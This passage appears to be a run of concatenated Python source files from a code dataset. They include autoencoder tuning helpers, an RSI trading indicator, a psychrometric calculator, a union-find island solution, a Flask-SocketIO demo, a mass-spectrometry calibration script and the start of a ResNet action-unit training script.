loss.append(modeltrain.history['loss'][-1])\r\n val.append(modeltrain.history['val_loss'][-1])\r\n times.append(train_time)\r\n if newparameter[i]:\r\n graphname = name_parameter(originparms, i, True, hypernames) + \".png\"\r\n plt.plot(values, loss, label='train', linestyle='dashed', linewidth = 3, marker='o', markersize=9)\r\n plt.plot(values, val, label='test', linestyle='dashed', linewidth = 3, marker='o', markersize=9)\r\n plt.title('Loss / Mean Squared Error in '+str(round(times[-1], 3))+'sec')\r\n plt.ylabel('Loss')\r\n plt.xlabel(name_parameter(originparms, i, False, hypernames))\r\n plt.legend(['loss', 'val_loss'], loc='upper left')\r\n print(\"Save graph with name: \",graphname)\r\n plt.savefig(graphname)\r\n plt.show()\r\n plt.close()\r\n return\r\n\r\ndef name_parameter(parameters, number, flag, hypernames):\r\n name = \"\"\r\n if (flag):\r\n if (number==0):\r\n name = \"Lx\"+\"_FS\"+str(parameters[1])+\"_FL\"+str(parameters[2])+\"_E\"+str(parameters[3])+\"_B\"+str(parameters[4])+\"_LV\"+str(parameters[5])\r\n elif (number==1):\r\n name = \"L\"+str(parameters[0])+\"_FSx\"+\"_FL\"+str(parameters[2])+\"_E\"+str(parameters[3])+\"_B\"+str(parameters[4])+\"_LV\"+str(parameters[5])\r\n elif (number==2):\r\n name = \"L\"+str(parameters[0])+\"_FS\"+str(parameters[1])+\"_FLx\"+\"_E\"+str(parameters[3])+\"_B\"+str(parameters[4])+\"_LV\"+str(parameters[5])\r\n elif (number==3):\r\n name = \"L\"+str(parameters[0])+\"_FS\"+str(parameters[1])+\"_FL\"+str(parameters[2])+\"_Ex\"+\"_B\"+str(parameters[4])+\"_LV\"+str(parameters[5])\r\n elif (number==4):\r\n name = \"L\"+str(parameters[0])+\"_FS\"+str(parameters[1])+\"_FL\"+str(parameters[2])+\"_E\"+str(parameters[3])+\"_Bx\"+\"_LV\"+str(parameters[5])\r\n elif (number==5):\r\n name = \"L\"+str(parameters[0])+\"_FS\"+str(parameters[1])+\"_FL\"+str(parameters[2])+\"_E\"+str(parameters[3])+\"_B\"+str(parameters[4])+\"_LVx\"\r\n else:\r\n name = hypernames[number]\r\n return name\r\n\r\ndef reshape_dataset(dataset, numarray):\r\n train_X, valid_X, train_Y, valid_Y = train_test_split(dataset, dataset, test_size=0.2, random_state=13)\r\n # Reshapes to (x, rows, columns)\r\n train_X = np.reshape(train_X.astype('float32') / 255., (-1, numarray[2], numarray[3]))\r\n valid_X = np.reshape(valid_X.astype('float32') / 255., (-1, numarray[2], numarray[3]))\r\n train_Y = np.reshape(train_Y.astype('float32') / 255., (-1, numarray[2], numarray[3]))\r\n valid_Y = np.reshape(valid_Y.astype('float32') / 255., (-1, numarray[2], numarray[3]))\r\n return train_X, valid_X, train_Y, valid_Y\r\n\r\ndef user_choices(model, modeltrain, parameters, originparms, train_time, newparameter, oldparm, df, hypernames):\r\n continue_flag = True\r\n while (True):\r\n try:\r\n run_again = int(input(\"\\nUSER CHOICES: choose one from below options(1-4): \\n1)Execute program with different hyperparameter\\n2)Show error-graphs\\n3)Save the existing model\\n4)Exit\\n---------------> \"))\r\n except:\r\n print(\"Invalid choice.Try again\\n\")\r\n continue\r\n if (run_again==1):\r\n try:\r\n indexparm = int(input(\"Choose what parameter would like to change (options 1-6): \\n1)Layers\\n2)Filter size\\n3)Filters/Layer\\n4)Epochs\\n5)Batch size\\n6)Latent vector\\n---------------> \"))\r\n except:\r\n print(\"Invalid choice.Try again\\n\")\r\n continue\r\n if (indexparm>=1 and indexparm<=6):\r\n try:\r\n changepar = int(input(\"Number for \"+ name_parameter(parameters, indexparm-1, False, hypernames) +\" is \"+str(parameters[indexparm-1])+\". 
Type the new number: \"))\r\n except:\r\n print(\"Invalid choice. Try again\\n\")\r\n continue\r\n tmpparm = oldparm\r\n if tmpparm<0:\r\n tmpparm = indexparm\r\n tmp = [parameters[tmpparm-1]] + [modeltrain.history['loss'][-1]] + [modeltrain.history['val_loss'][-1]] + [train_time]\r\n newparameter[tmpparm-1].append(tmp)\r\n df.loc[len(df), :] = parameters + [train_time] + [modeltrain.history['loss'][-1]] + [modeltrain.history['val_loss'][-1]]\r\n parameters = originparms.copy()\r\n parameters[indexparm-1] = changepar\r\n oldparm = indexparm\r\n break\r\n else:\r\n print(\"Invalid choice. Try again\\n\")\r\n elif (run_again == 2):\r\n error_graphs(modeltrain, parameters, train_time, newparameter, oldparm, originparms, hypernames)\r\n # continue_flag = False\r\n # break\r\n elif (run_again == 3):\r\n save_model(model)\r\n # continue_flag = False\r\n # break\r\n elif (run_again == 4):\r\n df.loc[len(df), :] = parameters + [train_time] + [modeltrain.history['loss'][-1]] + [modeltrain.history['val_loss'][-1]]\r\n df.drop_duplicates(subset=['Layers', 'Filter_Size', 'Filters/Layer', 'Epochs', 'Batch_Size', 'Latent_vector'], inplace=True)\r\n df = df.sort_values(by = 'Val_Loss', ascending=True)\r\n df.to_csv('loss_values.csv', sep='\\t', index=False)\r\n continue_flag = False\r\n print(\"Program terminates...\\n\")\r\n break\r\n else:\r\n print(\"Invalid choice. Try again\\n\")\r\n return parameters, continue_flag, oldparm\r\n\r\ndef input_parameters():\r\n parameters = []\r\n try:\r\n parameters.append(int(input(\"Type number of layers: \")))\r\n parameters.append(int(input(\"Type filter size: \")))\r\n parameters.append(int(input(\"Type number of filters/layer: \")))\r\n parameters.append(int(input(\"Type number of epochs: \")))\r\n parameters.append(int(input(\"Type batch size: \")))\r\n parameters.append(int(input(\"Type latent vector size: \")))\r\n except:\r\n print(\"Invalid choice. Try again\\n\")\r\n return parameters\r\n\r\ndef values_df():\r\n try:\r\n df = pd.read_csv('loss_values.csv',sep='\\t')\r\n except:\r\n loss_values = {'Layers': [], 'Filter_Size': [], 'Filters/Layer': [], 'Epochs': [], 'Batch_Size': [], 'Latent_vector': [], 'Train_Time': [], 'Loss': [], 'Val_Loss': []}\r\n df = pd.DataFrame(data=loss_values)\r\n return df\r\n\r\ndef write_output(list_output, numdata, filename):\r\n output_file = open(filename, 'wb')\r\n rows = 1\r\n columns = 10\r\n output_file.write(rows.to_bytes(4, 'big'))\r\n output_file.write(numdata.to_bytes(4, 'big'))\r\n output_file.write(rows.to_bytes(4, 'big'))\r\n output_file.write(columns.to_bytes(4, 'big'))\r\n for i in list_output:\r\n output_file.write(i.to_bytes(2, 'big'))\r\n output_file.close()\r\n\r\n# Normalization using feature scaling between any arbitrary points 0 and 25500\r\ndef normalization(embedding):\r\n a = 0\r\n b = 25500\r\n min = np.min(embedding[0][0])\r\n max = np.max(embedding[0][0])\r\n # https://en.wikipedia.org/wiki/Feature_scaling\r\n normalized = [((b-a)*((i-min)/(max-min))+a).astype(int) for i in embedding[0][0]]\r\n normalized = np.concatenate(normalized).ravel().tolist()\r\n return normalized\r\n\r\n# Write output file (2 bytes/pixel)\r\ndef write_outfile(pixels, numarray, autoencoder, imageset, outputname, parameters):\r\n if pixels is None:\r\n pixels, numarray = numpy_from_dataset(imageset, 4, False)\r\n newpixels = np.reshape(pixels, (-1, numarray[2], numarray[3]))\r\n embedding = list((K.function([autoencoder.input], [layer.output])(newpixels) for layer in autoencoder.layers if layer.output_shape == (None, 
parameters[5])))\r\n newlst = normalization(embedding)\r\n write_output(newlst, len(embedding[0][0]), outputname)\r\n","sub_path":"Reduce-Dimensions-Bottleneck-Autoencoder/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":11993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"341603111","text":"'''\nRSI indicator\n'''\nimport numpy as np\nfrom collections import OrderedDict\nimport chart_pattern as pattern\nimport trade_support as tsup\n\nMIN_NUM_BAR = 1\nRSI_LEN = 14\n\n\ndef setup_param(param):\n if 'nbar' in param:\n global MIN_NUM_BAR\n MIN_NUM_BAR = int(param['nbar'])\n\n if 'rsi_len' in param:\n global RSI_LEN\n RSI_LEN = int(param['rsi_len'])\n\n\ndef run_indicator(symbol, ohlc, param={}):\n ind_dct = OrderedDict()\n __algo_func(ohlc, ind_dct)\n __algo_strategy(ohlc, ind_dct)\n return ind_dct\n\n\ndef __algo_func(ohlc, ind_dct):\n prices = ohlc['Adj Close']\n deltas = np.diff(prices)\n seed = deltas[:RSI_LEN + 1]\n up = seed[seed >= 0].sum() / RSI_LEN\n down = -seed[seed < 0].sum() / RSI_LEN\n rs = up / down\n\n rsi = np.zeros_like(prices)\n rsi[:RSI_LEN] = 100. - 100. / (1. + rs)\n\n for i in range(RSI_LEN, len(prices)):\n delta = deltas[i - 1] # cause the diff is 1 shorter\n\n if delta > 0:\n up_val = delta\n down_val = 0.\n else:\n up_val = 0.\n down_val = -delta\n\n up = (up * (RSI_LEN - 1) + up_val) / RSI_LEN\n down = (down * (RSI_LEN - 1) + down_val) / RSI_LEN\n\n rs = up / down\n rsi[i] = 100. - 100. / (1. + rs)\n # get the last one\n ind_dct['rsi'] = round(rsi[-1], 3)\n ohlc['rsi'] = rsi\n\n return ind_dct\n\n\ndef __algo_strategy(ohlc, ind_dct):\n '''\n offset = self.cl\n over_sold = 30\n over_bought = 70\n prev = self.rsi[-offset]\n for idx, rs in enumerate(self.rsi[-offset:]):\n if (prev < over_sold) and (rs > over_sold):\n self.ind['rsi_b'] = \"True(%d)\" % (offset-idx)\n if (prev > over_bought) and (rs < over_bought):\n self.ind['rsi_s'] = \"True(%d)\" % (offset-idx)\n prev = rs\n return\n '''\n buy_sig, sell_sig = pattern.cross_value(ohlc['rsi'], ohlc['rsi'], 30, 70, MIN_NUM_BAR)\n tsup.get_last_signal(buy_sig, sell_sig, ind_dct, 'rsi_b', 'rsi_s')\n ohlc['rsi_b'] = buy_sig\n ohlc['rsi_s'] = sell_sig\n","sub_path":"core/algo_rsi.py","file_name":"algo_rsi.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"351140537","text":"#Title :-Calculate symmetric difference between 2 sets\n#Author :-Vighnesh Gawad\n#Created:-15 october 2018\na=input()\nb= set(list(map(int, input().split())))\nc=input()\nd=set(list(map(int, input().split())))\nmyset=b.difference(d)\nmyset.update(d.difference(b))\nl=sorted(list(myset))\nfor i in (l):\n print(i)\n","sub_path":"Sets/SymmetricDifference.py","file_name":"SymmetricDifference.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586888459","text":"import psychrolib\n\npsychrolib.SetUnitSystem(psychrolib.SI)\n\nprint(\"\")\n\ninval = input (\"Please enter the dry-bulb temperature: \")\ninv = float(inval)\n\nprint(\"\")\n\ninval2 = input (\"Please enter the pressure: \")\ninv2 = float(inval2)\n\nprint(\"\")\n\ninval3 = input (\"Please enter the humidity ratio: \")\ninv3 = float(inval3)\n\nprint(\"\")\n\ninval5 = input (\"Please enter the kg of dry air and water vapor: \")\ntotmass = float(inval5)\n\nenth = psychrolib.GetMoistAirEnthalpy(inv, inv3)\nens = 
str(enth)\n\nvol = psychrolib.GetDryAirVolume(inv, inv2)\nens2 = str(vol)\n\nmvol = psychrolib.GetMoistAirVolume(inv, inv3, inv2)\nens3 = str(mvol)\n\ntotvol = float(vol + mvol)\nspvol = totvol/totmass\n\nspecvol = str(spvol)\n\nprint(\"\")\n\nprint (\"The moist-air enthalpy is: \" + ens)\n\nprint(\"\")\n\nprint (\"The dry-air volume is: \" + ens2)\n\nprint(\"\")\n\nprint (\"The moist-air volume is: \" + ens3)\n\nprint(\"\")\n\nprint (\"The specific volume is: \" + specvol)\n\n\n#Specific volume is defined as the total volume of dry air and water vapor mixture per kg of dry air and water vapor (SI-units). The specific volume can be expressed as: v = V / (ma + mw) (11)\n\n","sub_path":"enth.py","file_name":"enth.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"312765314","text":"# union find\nclass Solution(object):\n def largestIsland(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if not grid or not grid[0]:\n return 0\n m, n = len(grid), len(grid[0])\n parent = {(i, j): (i, j) for i in range(m) for j in range(n) if grid[i][j] == 1}\n size = {(i, j): 1 for i in range(m) for j in range(n) if grid[i][j] == 1}\n \n def find(u):\n if parent[u] != u:\n parent[u] = find(parent[u])\n return parent[u]\n \n def union(u, v):\n p, q = find(u), find(v)\n if p != q:\n if size[p] < size[q]:\n p, q = q, p\n parent[q] = p\n size[p] += size[q]\n return True\n return False\n \n for i in range(m):\n for j in range(n):\n if grid[i][j] == 0:\n continue\n for dx, dy in [(-1, 0), (0, -1)]:\n p, q = i + dx, j + dy\n if 0 <= p < m and 0 <= q < n and grid[p][q] == 1:\n union((i, j), (p, q))\n for u in parent: # path-compress every node; a bare map() is lazy in Python 3 and would be a no-op\n find(u)\n \n # check the islands near current grid[i][j]==0\n res = 1\n# res = max(size.values()) # size might be empty and max will throw an error\n for i in range(m):\n for j in range(n):\n if grid[i][j] == 1: \n res = max(res, size[find((i,j))])\n else:\n roots = set()\n for dx, dy in [(1, 0), (-1, 0), (0, 1), (0, -1)]:\n p, q = i + dx, j + dy\n if 0 <= p < m and 0 <= q < n and grid[p][q] == 1:\n roots.add(find((p, q)))\n # cur means the size of the max island if we change (i, j) from 0 to 1\n cur = 1\n for root in roots:\n cur += size[root]\n res = max(res, cur)\n \n return res\n\n\n\n\n\"\"\"\nIn a 2D grid of 0s and 1s, we change at most one 0 to a 1.\n\nAfter, what is the size of the largest island? \n(An island is a 4-directionally connected group of 1s).\n\nExample 1:\n\nInput: [[1, 0], [0, 1]]\nOutput: 3\nExplanation: Change one 0 to 1 and connect two 1s, then we get an island with area = 3.\nExample 2:\n\nInput: [[1, 1], [1, 0]]\nOutput: 4\nExplanation: Change the 0 to 1 and make the island bigger, only one island with area = 4.\nExample 3:\n\nInput: [[1, 1], [1, 1]]\nOutput: 4\nExplanation: Can't change any 0 to 1, only one island with area = 4.\n \n\nNotes:\n\n1 <= grid.length = grid[0].length <= 50.\n0 <= grid[i][j] <= 1.\n\"\"\"\n","sub_path":"0827. Making A Large Island.py","file_name":"0827. 
Making A Large Island.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"618958837","text":"import math\n\nfrom ..maths import Vector2D\nfrom .core import ConfigurationError\n\ndef getDirectionOrAngle(config, direction_name='direction', angle_name='angle', return_none=False):\n\tdirection = config.get(direction_name)\n\tangle = config.get(angle_name)\n\n\tif return_none and direction == angle == None:\n\t\treturn None\n\n\tif (direction is None) == (angle is None):\n\t\traise ConfigurationError(\n\t\t\t\"Either only ``direction`` or ``angle`` must be defined.\")\n\n\tif direction is None:\n\t\tdirection = Vector2D.fromAngle(angle, radians=config.get(\"radians\", True))\n\telse:\n\t\tdirection = Vector2D(*direction).normalize()\n\treturn direction\n","sub_path":"dml/components/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"36414753","text":"\"\"\"\nDemo Flask application to test the operation of Flask with socket.io\nAim is to create a webpage that is constantly updated with random numbers from a background python process.\n30th May 2014\n\"\"\"\n\n# Start with a basic flask app webpage.\nfrom flask_socketio import SocketIO\nfrom flask import Flask, render_template, url_for, copy_current_request_context\nfrom random import random\nfrom time import sleep\nfrom threading import Thread, Event\n\n\n__author__ = 'slynn'\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\napp.config['DEBUG'] = True\n\n#turn the flask app into a socketio app\nsocketio = SocketIO(app)\n\n#random number Generator Thread\nthread = Thread()\nthread_stop_event = Event()\n\nclass RandomThread(Thread):\n def __init__(self):\n self.delay = 1\n super(RandomThread, self).__init__()\n\n def randomNumberGenerator(self):\n \"\"\"\n Generate a random number every 1 second and emit to a socketio instance (broadcast)\n Ideally to be run in a separate thread?\n \"\"\"\n #infinite loop of magical random numbers\n print(\"Making random numbers\")\n while not thread_stop_event.isSet():\n number = round(random()*10, 3)\n print(number)\n socketio.emit('message', number)\n sleep(self.delay)\n\n def run(self):\n self.randomNumberGenerator()\n\n\n@socketio.on('connect')\ndef test_connect():\n # need visibility of the global thread object\n global thread\n print('Client connected')\n\n #Start the random number generator thread only if the thread has not been started before.\n if not thread.is_alive():\n print(\"Starting Thread\")\n thread = RandomThread()\n thread.start()\n\n@socketio.on('disconnect')\ndef test_disconnect():\n print('Client disconnected')\n\n\nif __name__ == '__main__':\n socketio.run(app, host='localhost', port=2999)","sub_path":"pextant/webapp/flaskdemo.py","file_name":"flaskdemo.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"479080365","text":"def dfs_non_recursive(graph, source): # Provide a graph and a starting point\n if source is None or source not in graph:\n return \"Invalid input\"\n path = []\n stack = [source]\n while(len(stack) != 0):\n s = stack.pop()\n if s not in path:\n path.append(s)\n if s not in graph:\n continue\n for neighbor in graph[s]:\n stack.append(neighbor)\n return \" 
\".join(path)\n","sub_path":"PYTHON/DFS-Non_Recursive.py","file_name":"DFS-Non_Recursive.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"319959669","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 6 14:01:33 2019\n\n@author: scott\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom EC_MS import download_cinfdata_set, plot_signal, plot_signal_vs_temperature, compare_signal_to_temperature\nfrom EC_MS import load_calibration_results\nfrom EC_MS import plot_flux\n\nplt.close('all')\n\n\ndata = download_cinfdata_set(setup='microreactorNG', time='2019-06-25 09:52:30')\n\n#plot_signal(data, leg=True, meta_data=['TC temperature'], rh_label='Temperature [C]')\n#plot_signal_vs_temperature(data, leg=True, reciprocal=True)\ncompare_signal_to_temperature(MS_data=data)\nplt.show()\nexit()\n\nmdict = load_calibration_results('19F04_calibration.pkl')\n\n\n\nO2, CO2, CO, Ar = mdict['O2'], mdict['CO2'], mdict['CO'], mdict['Ar']\n\nif True: # take background from CO2 cracking into account when calculating CO flux\n # NOTE below on why cal_mat is used exactly this way.\n CO.cal_mat = {'M28':1/CO.F_cal}\n CO.cal_mat['M44'] = - CO.cal_mat['M28'] * CO2.spectrum['M28']/CO2.spectrum['M44']\n\n\n\n#plot_flux(data, mols=[O2, CO2, CO, Ar], unit='pmol/s')\n\nCO2.get_bg(data, tspan=[0, 100])\n\ntspan = [11000, 14000]\nx, y = CO2.get_flux(data, tspan=tspan, background='preset',\n unit='pmol/s')\n\nfig, ax = plt.subplots()\nax.plot(x, y, color=CO2.get_color())\nprint(y.shape)\ny_bg = CO2.background*1e12 * np.ones(y.shape)\n\nax.plot(x, y_bg, color=CO2.get_color(), linestyle='--')\n\nax.set_yscale('log')\n\nax.set_ylabel('cal. 
CO2 signal / [pmol/s]')\nax.set_xlabel('time / s')\n\n\nprint('CO2 flux during tspan=' + str(tspan) + ' is ' + str(np.mean(y)) + ' pmol/s')\n#plt.show()\n\n\n# Trying something else now !!!!\n\n\nfrom EC_MS import Chip\n\nchip = Chip('MR12')\nprint('\\nAir flux through the chip in pmol/s: ' + str(chip.capillary_flow(gas='air') / 6.02e23 * 1e12))\n\n\nprint('flux of 1 bar CO2 through chip at 100 C in pmol/s: ' + str(chip.capillary_flow(gas='CO2', T=398.15) / 6.02e23 * 1e12))\n\n\n\n\n\n\nx_CO2, y_CO2 = CO2.get_flux(data, tspan=[2000, 75000])\nx_CO, y_CO = CO.get_flux(data, tspan=[2000, 75000])\nx_Ar, y_Ar = Ar.get_flux(data, tspan=[2000, 75000])\nx_O2, y_O2 = O2.get_flux(data, tspan=[2000, 75000])\n\nl = min(len(y_CO2), len(y_CO), len(y_O2), len(y_Ar))\n\n\np_CO2 = y_CO2[0:l] / (y_CO2[0:l] + y_CO[0:l] + y_Ar[0:l] + y_O2[0:l]) # CO2 partial pressure in chip in bar\np_CO = y_CO[0:l] / (y_CO2[0:l] + y_CO[0:l] + y_Ar[0:l] + y_O2[0:l]) # CO2 partial pressure in chip in bar\np_Ar = y_Ar[0:l] / (y_CO2[0:l] + y_CO[0:l] + y_Ar[0:l] + y_O2[0:l]) # CO2 partial pressure in chip in bar\np_O2 = y_O2[0:l] / (y_CO2[0:l] + y_CO[0:l] + y_Ar[0:l] + y_O2[0:l]) # CO2 partial pressure in chip in bar\n\nprint(l)\nt1 = 2500#end time of first cycle\nt2 = 5000#end time of second cylle\nt3 = 7500#end time of third cycle\n\n\nfig, ax = plt.subplots()\nax.plot(x_CO2[0:l], p_CO2, color=CO2.get_color(), label='CO2')\nax.plot(x_CO2[0:l], p_CO, color=CO.get_color(), label='CO')\nax.plot(x_CO2[0:l], p_O2, color=O2.get_color(), label='O2')\nax.plot(x_CO2[0:l], p_Ar, color=Ar.get_color(), label='Ar')\n\nax.plot(x_CO2[0:t1], 0.5*np.ones(x_CO2[0:t1].shape), color='blue', linestyle='--')\nax.plot(x_CO2[t1:t2], 1/2.5*np.ones(x_CO2[t1:t2].shape),color='green', linestyle='--') \nax.plot(x_CO2[t2:t3], 1/3.5*np.ones(x_CO2[t2:t3].shape), color='red', linestyle='--') \n\nplt.show()\n\n\n\n'''\n ------- NOTE: use of m.cal_mat --------\nWhen a Molecule object has the attribute cal_mat, it is used instead of the\nmore simple F_cal to calculate the molecule's flux from a given set of m/z signals.\n\nEach m/z signal (at mass, e.g. 'M29') in the desired timespan is multiplied by cal_mat[M], and then\nthese are added up to give the flux. In the most simple case, cal_mat has only one\nitem, at the primary mass, which is just the reciprocal of F_cal (since F_cal is an absolute\nsensitivity factor, you divide by it to go from signal to flux), i.e.:\nmolecule.cal_mat = {molecule.primary: 1/molecule.F_cal}\n\nIf we have an interference at the molecule's primary mass due to e.g., propane,\nwe can correct for this using cal_mat. We put a negative value for the primary mass\nof the interfering molecule, i.e. 'M29' for propane, so that so that a factor times\nthe M29 signal is subtracted when calculating the flux. What should this factor be?\nAs an example, use propene, with primary='M41'. 
The signal at M41 is:\n\nS_M41 = j_C3H6 * F_M41_C3H6 + j_C3H8 * F_M41_C3H8\nS_M41 = j_C3H6 * F_M41_C3H6 + (S_M29/F_M29_C3H8) * F_M41_C3H8\nisolating j_C3H6:\nj_C3H6 = 1/F_M41_C3H6 * (S_M41 - F_M41_C3H8/F_M29_C3H8 * S_M29)\nj_C3H6 = 1/F_M41_C3H6 * S_M41 + (-1/F_M41_C3H6 * F_M41_C3H8/F_M29_C3H8) * S_M29\n\nso the factor to multiply S_M29 by, cal_mat['M29'] is\n-1/F_M41_C3H6 * F_M41_C3H8/F_M29_C3H8 = -ratio/F_M41_C3H6\n\nwhere ratio can be obtained from the propane spectrum:\nratio = C3H8.spectrum['M41']/C3H8.spectrum['M29']\n\nThis is implemented below.\n\n'''\n\n","sub_path":"calibration/Krabbe_using_gas_calibration2.py","file_name":"Krabbe_using_gas_calibration2.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"242060207","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Xin Dou'\n__email__ = \"master2dou@gmail.com\"\n\nimport xml.etree.ElementTree as ET\n\nfrom wechat.responser.response import Response\n\n\nclass NewsResponse(Response):\n def __init__(self, from_user_name, to_user_name, article_list):\n Response.__init__(self, from_user_name, to_user_name)\n self.article_list = article_list\n\n msg_type_element = ET.SubElement(self.root_element, \"MsgType\")\n msg_type_element.text = self.create_cdata(\"news\")\n self._parser_articles()\n\n def _parser_articles(self):\n article_count_element = ET.SubElement(self.root_element, \"ArticleCount\")\n article_count_element.text = self.create_cdata(len(self.article_list))\n\n articles_element = ET.SubElement(self.root_element, \"Articles\")\n\n for item in self.article_list:\n item_element = ET.SubElement(articles_element, \"item\")\n title_element = ET.SubElement(item_element, \"Title\")\n title_element.text = self.create_cdata(item.title)\n\n description_element = ET.SubElement(item_element, \"Description\")\n description_element.text = self.create_cdata(item.description)\n\n pic_url_element = ET.SubElement(item_element, \"PicUrl\")\n pic_url_element.text = self.create_cdata(item.pic_url)\n\n url_element = ET.SubElement(item_element, \"Url\")\n url_element.text = self.create_cdata(item.url)","sub_path":"responser/newsresponse.py","file_name":"newsresponse.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"325292516","text":"import glob\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport h5py\nfrom PIL import Image\nfrom sklearn.externals import joblib\nimport shutil\nimport os\nimport random\nimport pickle\nimport time\nimport gc\nimport re\nfrom tensorboardX import SummaryWriter\nimport time\nimport math\nimport sys\nfrom torchvision import datasets, models, transforms\nimport csv\nimport pandas as pd\n\npreprocess = transforms.Compose([\n\ttransforms.ToTensor(),\n\ttransforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n'----------------------------------------------------Resnet------------------------------------------------------------'\nclass resnetAU(nn.Module):\n\tdef __init__(self,resnet_pre):\n\t\tsuper(resnetAU, self).__init__()\n\t\t#defining layers in convnet\n\t\tself.resnet=resnet_pre\n\t\tself.fcau = nn.Linear(512,17)\n\n\tdef forward(self, x):\n\t\tx = self.resnet(x)\n\t\tx = 
x.squeeze(2)\n\t\tx = x.squeeze(2)\n\t\tx = self.fcau(x)\n\t\treturn x\n\nresnet18_filename = 'resnet_only_BEST.pth.tar'\nresnet_pre = models.resnet18(pretrained=True) # Define resnet18 model\nnum_ftrs = resnet_pre.fc.in_features\nresnet_pre.fc = nn.Linear(num_ftrs, 6).cuda()\nstate = torch.load(resnet18_filename)\nresnet_pre.load_state_dict(state['model'])\nmodules = list(resnet_pre.children())[:-1] # delete the last fc layer and the avg.pool layer\nresnet_pre = nn.Sequential(*modules)\nresnet = resnetAU(resnet_pre)\n# print(resnet)\n\n'------------------------------------------------------Hyperparameters-------------------------------------------------'\nbatch_size = 8\nno_of_AUs = 17\nuse_CUDA = True\nuse_pretrained = False\ntest_mode = False\nval_mode = False\ntrain_mode = True\nno_of_epochs = 1000\nwriter = SummaryWriter('./logs_CREMAD_AU')\nread_prev_list = False and not test_mode\n'----------------------------------------------------------------------------------------------------------------------'\ncurr_epoch = 0\ntotal = 0\n'----------------------------------------------------------------------------------------------------------------------'\nresnet = resnet.cuda()\n'----------------------------------------------------------------------------------------------------------------------'\ncriterion = nn.MSELoss()\nparams = list(resnet.parameters())\nprint('Parameters in the model = ' + str(len(params)))\noptimizer = torch.optim.Adam(params, 0.000001)\n\n'------------------------------------------Saving Intermediate Models--------------------------------------------------'\n\n\ndef save_checkpoint(state, is_final, filename='AU_net'):\n\tfilename = filename +'_'+str(state['epoch'])+'.pth.tar' \n\ttorch.save(state, './AUNet/'+filename)\n\tif is_final:\n\t\tshutil.copyfile(filename, 'model_final.pth.tar')\n\n\n'-------------------------------------------Setting into train mode----------------------------------------------------'\n\nif not train_mode:\n\tresnet.train(False)\nelse:\n\tresnet.train(True)\n'----------------------------------------------------------------------------------------------------------------------'\nif train_mode:\n\tvocal_directory = \"./WAVFiles/train\"\n\tvisual_directory = \"../train_30\"\nelif val_mode:\n\tvocal_directory = \"./WAVFiles/val\"\n\tvisual_directory = \"../val_30\"\nelse:\n\tvocal_directory = \"./WAVFiles/test\"\n\tvisual_directory = \"../test_30\"\n'----------------------------------------------------------------------------------------------------------------------'\nnames = {}\nstart_time = time.time()\nemotions = ['A','D','F','H','N','S']\nall_frames = []\nfor emotion in emotions:\n\tfor idx,filename in enumerate(sorted(glob.iglob(visual_directory+'/'+emotion+'/'+'*.jpg'))):\n\t\tall_frames.append(filename)\n\t\tstart_len = len(visual_directory+'/'+emotion+'/')\n\t\t# if(filename[-6].isdigit()):\n\t\t# \tstart_len = len(visual_directory+'/'+emotion+'/')\n\t\t# \tstring = filename[:start_len+15]\n\t\t# \tnames[string] = max(1,int(filename[-6:-4]))\n\t\t\t# if(names[string]<45):\n\t\t\t# \tdel(names[string])\ntime_elapsed = time.time() - start_time\nprint(len(names))\nprint(time_elapsed)\n\nprev_loss = 0\n\nsequences = []\n\nemo_dict = {\"ANG\":0, \"DIS\":1 ,\"FEA\" :2 ,\"HAP\" :3, \"NEU\" : 4, \"SAD\":5}\n\nif not train_mode:\n\tno_of_epochs = 1\n\tbatch_size = 1\nall_frames = np.random.permutation(np.array(all_frames))\nfor epoch in range(curr_epoch,no_of_epochs):\n\tj_start = 0\n\trunning_loss = 0\n\trunning_corrects = 0\n\tif 
